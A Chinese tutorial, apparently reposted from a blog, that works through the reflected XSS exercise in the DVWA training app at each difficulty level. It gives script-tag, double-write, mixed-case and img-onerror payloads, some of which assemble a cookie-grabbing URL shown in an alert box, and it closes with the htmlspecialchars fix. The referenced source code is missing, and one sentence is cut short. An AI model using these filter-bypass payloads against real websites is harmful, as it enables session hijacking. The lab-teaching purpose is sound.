DVWA-XSS(Reflected) 全级别教程
XSS(Reflected)
文章目錄
- XSS(Reflected)
- Low等級
- 獲取cookie
- Medium等級
- 查看源碼
- 利用雙寫繞過
- 獲取cookie
- 大小寫混淆繞過
- 獲取cookie
- High等級
- 查看源碼
- Impossible等級
- 查看源碼
Low等級
查看源碼
可以看到,代碼直接引用了name參數,并沒有任何的過濾與檢查,存在明顯的XSS漏洞。
輸入<script>alert(/左小舟/)</script>,成功彈框
獲取cookie
<script>alert( 'http://192.168.0.107/cookie/?cookie='+document.cookie)</script>,彈窗成功
Medium等級
查看源碼
使用str_replace函數將輸入中的
利用雙寫繞過
<sc<script>ript>alert(/zzz/)</script>,成功彈框
獲取cookie
<sc<script>ript>alert('zwy-http:// 192.168.0.107/cookie/?cookie='+document.cookie)</script>,成功彈框
大小寫混淆繞過
<ScRipt>alert(/zzz/)</script>,成功彈框
獲取cookie
<ScRipt>alert('http:// 192.168.0.107/cookie/?cookie='+document.cookie)</script>,成功彈框
High等級
查看源碼
preg_replace() 函數用于正則表達式的搜索和替換,這使得雙寫繞過、大小寫混淆繞過(正則表達式中i表示不區分大小寫)不再有效。
通過img、body等標簽的事件或者iframe等標簽的src注入惡意的js代碼。
輸入<img src=1 onerror=alert(/zzz/)>,成功彈框
輸入<img src=1 onerror=alert('http://192.168.0.107/cookie/?cookie='+document.cookie)>,成功彈框
Impossible等級
查看源碼
可以看到,Impossible級別的代碼使用htmlspecialchars函數把預定義的字符&、”、 ’、<、>轉換為HTML實體,防止瀏覽器將其作為HTML元素。
總結
以上是生活随笔為你收集整理的DVWA-XSS(Reflected) 全级别教程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: JS-加入收藏夹的代码
- 下一篇: 使用sqlplus显示中文为乱码的解决办